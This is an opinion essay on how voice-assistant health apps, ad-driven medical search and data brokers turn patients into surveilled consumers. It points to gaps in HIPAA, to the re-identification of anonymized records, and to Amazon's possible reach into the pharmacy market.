Home

Heal Thyself

Self-directed health care through digital assistants replaces professional guidance with algorithmic manipulation

This past summer Libertana, a California-based assisted-living corporation, tested a voice-controlled health care assistant, based on Amazon’s digital assistant Alexa, on several elderly patients. It was designed to help users complete their own health care rituals, like daily exercise, managing medications, and communicating with nearby caregivers — enabling the elderly to take care of themselves. The app has already been praised for its potential to revolutionize the way we record and access information. For physicians, voice-enabled AI could eliminate the need for note taking; for patients, it could result in unprecedented access to their own records and a new ease of medical information sharing with caregivers and family members.

Libertana’s digital assistant is part of a supposed technological revolution in health care that promises to make us more autonomous in pursuing medical care and less reliant on a system that is confusing, expensive, and often unfair. In his 2015 book The Patient Will See You Now, cardiologist and futurist Eric Topol describes how new technologies, along with increased patient access to data, will empower individuals to seize control over their health and dismantle America’s flawed paternal system of health care. Using a Silicon Valley–inspired rhetoric of disruption and innovation, Topol argues that developments such as virtual doctor’s offices, phone-based blood tests, and centralized electronic health records will free individuals from the oppressive structures of top-down medicine, creating a radical, democratized system of care. He anticipates that access to online forums and academic journals will prompt a revolution in medical self-advocacy comparable to the rise in literacy after the advent of the printing press. “We now have the formula for freedom, for relative autonomy from the canonical medical community that forced patients to be subservient and dependent,” Topol writes. Soon, “each individual will have all their own medical data and the computing power to process it in the context of their own world.”

Our ad hoc medical research takes place amid the same gamified systems that seek to absorb attention, maximize user engagement, and sell advertisements

Innovations that promote the self-management of health care appear to be sensible cost-controlling and efficiency-generating measures in a time when medical expenditures are spiraling out of control. But these new technologies also raise questions, not only as to whether we can trust, let alone successfully navigate, the medical information sphere without professional guidance, but also how much personal data we should give up for the sake of advanced care.


It may seem like a useful stopgap to imagine that those marginalized by the U.S.’s current “system” of care can at least access alternate online resources for researching symptoms, medications, and the risks that come along with them. But not only does it take time, research skills, and basic medical expertise to orient one’s efforts, but such searches also take place in an informational environment primarily aimed at corporate profit rather than human well-being.

Tech companies are eager to aid our transition from patients to consumers to “empowered users” of health care by mediating our access to medical information, but what they show us is not necessarily guided by its accuracy or relevance to our condition. Our ad hoc medical research takes place amid the same gamified systems that seek to absorb attention, maximize user engagement, and sell advertisements. Tristan Harris, a former “design ethicist” at Google, has described the ways in which apps and internet sites are built to “hijack” users’ attention and take advantage of their vulnerabilities. Patients anxiously seeking medical information about their own condition would be entering into the same arena and, given their likely state of mind, are likely to be even more susceptible to manipulation.

Many search engines ultimately rely on advertisements for income, so would-be self-advocates are more likely to access links to paid ads the company deems relevant to them than useful information about their condition. For example, the Verge recently reported on how addicts seeking rehab facilities have been misled and exploited by paid search results.

People might turn to medical databases like WebMD to self-diagnose, but that site, owned by a for-profit company, not only includes sponsored links but it also suggests related health anomalies to keep visitors engaged and online. What might start as an innocuous Google search about ovarian cysts can quickly turn into hypochondria-inducing hours reading about rare hair and tooth-filled dermoids.

When we turn to the web to guide ourselves to medical information, we inevitably expose ourselves to advertising and clickbait geared toward diverting our attention rather than informing us. In the process, we also generate a lucrative data trail for the tech companies tracking our online activity; they can sell information about our health concerns to fuel subsequent rounds of ever-more targeted advertising that perpetuates the cycle.


Even more concerning are the risks of creating a centralized, electronic database of people’s medical conditions — an Equifax for people’s health “score.” This would create a highly tempting target for hackers, corporations, and governments alike to abuse and exploit.

In a January 2017 report for the Century Foundation, Adam Tanner traces health-care-data exploitation back to the creation of Medicare and Medicaid in the 1960s. For the first time ever, huge databases of health care information were digitized, leading to the rapid development of mass-market analysis in the 1970s. “The proliferation of digitized medical information created new commercial opportunities … for health-data-mining companies, which started buying copies of pharmacy scripts to create doctor-identified reports that detail what medications individual physicians prescribe,” Tanner writes. “Armed with such insights, pharmaceutical salespeople [were] able to tailor sales pitches carefully.”

Today, health care information is supposed to be protected under the Health Insurance Portability and Accountability Act of 1996 (HIPAA). The regulation is intended to limit the exchange of health care data between doctors, hospitals, clinics, and other official care providers according to patient permissions. But the outdated legislation does not extend to unofficial health-related services. For example, patients can manage and store their electronic health records on Microsoft’s HealthVault, but because it is a consumer-facing service, not created by and for the use of providers, it does not fall under the regulation of HIPAA.

This doesn’t mean non-HIPAA compliant apps are without privacy protections. It’s in the best interest of data-storing services, health bots, and even diabetes-tracking apps to promise privacy, and these services are held accountable to those promises by the Federal Trade Commission. If an app’s privacy policy says it won’t share your data, it can’t, but there is a loophole. Most platforms don’t extend their privacy policy to third-party actors who might have access your data, so a lot of these apps — particularly those that sell products or route you to websites that recommend nearby physicians are actually sharing your information.

The most disturbing example of this is in a recent study published on Freedom to Tinker, hosted by Princeton’s Center for Information Technology Policy, that found that many websites are now using “session replay scripts,” a beefed-up version of third-party analytics that not only track the links you click and the searches you make but also “your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit.” These scripts enable potential third parties to obtain sensitive information — like medical data — increasing the risks of identity theft and online scams.

Even provider-generated data within the health care system that is protected under HIPAA is for sale — as long as it’s distributed in anonymized form. But anonymized data doesn’t always stay that way. Data mining companies can cross-check de-identified medical information with other data to create comprehensive lists of individual health histories, even without access to information labeled by name. “The ‘De-ID engine’ allows data miners to assemble a patient dossier with thousands of data points spanning back years,” Tanner writes. “The file does not include a name, but lists age and gender, as well as what section of Cleveland she lives in [for example]. Her doctors, whose information is not protected by HIPAA, can be listed by name.”

Not only that, but a great deal of what amounts to health data is now generated outside the health care system altogether. Thanks to electronic purchase histories, social media use, wearable trackers like FitBit, and online surveillance, data analytics firms are able to capture a fairly accurate image of our health without having any access to conventional medical records.

As the laws protecting our private health care information lose relevance, our faith in the medical system may deteriorate. If we can’t trust that our medical records are safe in the hands of health care professionals, we may also be less likely to divulge personal information necessary for adequate care. As consumers, we are already becoming numbed to the once shocking specificity of targeted ads based on prior purchases or Googled goods, but the stakes are raised when it comes to health information. When the risks of data leaks extend to potential doxxing, job loss, and increased insurance premiums, protecting our personal data can become a matter of survival.

A great deal of what amounts to health data is now generated outside the health care system altogether. Data analytics firms can capture a fairly accurate image of our health without access to medical records

For platforms, maintaining a constant flow of data is paramount to both generating income and drawing in new customers. “The more activities a firm has access to, the more data it can extract and the more value it can generate from [that] data,” writes Nick Srnicek in Platform Capitalism. “Equally, access to a multitude of data from different areas of our life makes prediction more useful, and this simulates the centralization of data within one platform.”

This suggests that data aggregators have a good reason to build versatile databases that fuse medical information with other data in order to profile individuals and calculate their vulnerabilities. As part of a strategy to lure new customers during major life events, the moments when they are most prone to form new buying habits, Target, for example, used consumer data to locate pregnant women and send discount fliers for baby supplies to their homes. But not all customers want their health-related privacy violated for the sake of coupons and corporate profits: In one instance, a teenage girl’s family found out she was pregnant after Target sent maternity coupons to her home.


Medical information online is presented mainly to capture and divert our attention for revenue, not necessarily to inform us. The increasing digitization of our medical data means that it can be readily aggregated, disseminated and sold for profit without our consent. Health chatbots, which ask for our data and exist in a murky informational space outside traditional medical advocacy, appear to fuse these possibilities. If one’s request for medical advice can automatically be turned into valuable data for third parties, a virtual health care assistant can seem more like a lead generator for medical providers than an AI-driven adviser for users.

For monopoly corporations that generate their own exclusively held consumer health data — like Amazon — the opportunities for growth are endless. Amazon Web Services is HIPAA compliant and hosts the lion’s share of electronic health records, but Alexa’s systems are not. What this means is that there are no regulations barring that platform from collecting health-related data, a boon for the company that already sells medical books and supplies and was just recently approved to join the $560 billion pharmaceutical market in several states.

One can imagine the massive potential for pharma sales based on the data collected by Alexa. Whether Amazon’s AI services make it into the doctor’s office or remain in the home, a chatbot’s ability to make suggestions based on an amalgamation of user’s consumer and health data implies that the corporation could easily seize control of the market and redefine how we access and receive medical care. Pharmaceutical companies already hold sway over which medications practitioners prescribe. If Amazon becomes both the doctor and the pharmacist, we could be beholden to a corporate health monopoly that favors profit over cures.

According to Topol, it’s only a matter of time before we are being constantly monitored by bloodstream nanochips and virtual physicians, but as monopoly platforms race for influence in emerging health care markets, it appears as though we’re simply witnessing a restructuring of a corporate-controlled system of medicine under the guise of self-empowerment and democratized care. For the rich, this could mean access to high-tech procedures and a substantial increase in life expectancy; for the poor, it could mean spending your final days at home with only an Amazon-powered robot to keep you company.

New regimes of data collection, aggregation, and analysis have the potential to revolutionize systems for the better, but they also threaten us with new forms of control, the ramifications of which we have only begun to consider. Like most other things in the datafied world, personalization is a byword for surveillance and regulation. As medical privacy becomes more and more unattainable and our bodies become increasingly quantified, the question becomes whether these “advancements” in care will have our best interests in mind. New health care technologies make us feel like the increased codification of our bodies leads to our own empowerment, but as we morph from patients to users we are simply shifting from one controlled environment to another.

Taylore Scarabelli is a New York-based writer whose work focuses on fashion, feminism, and technology. She has written for DazedFlauntTopical Cream, and Under the Influence, among others.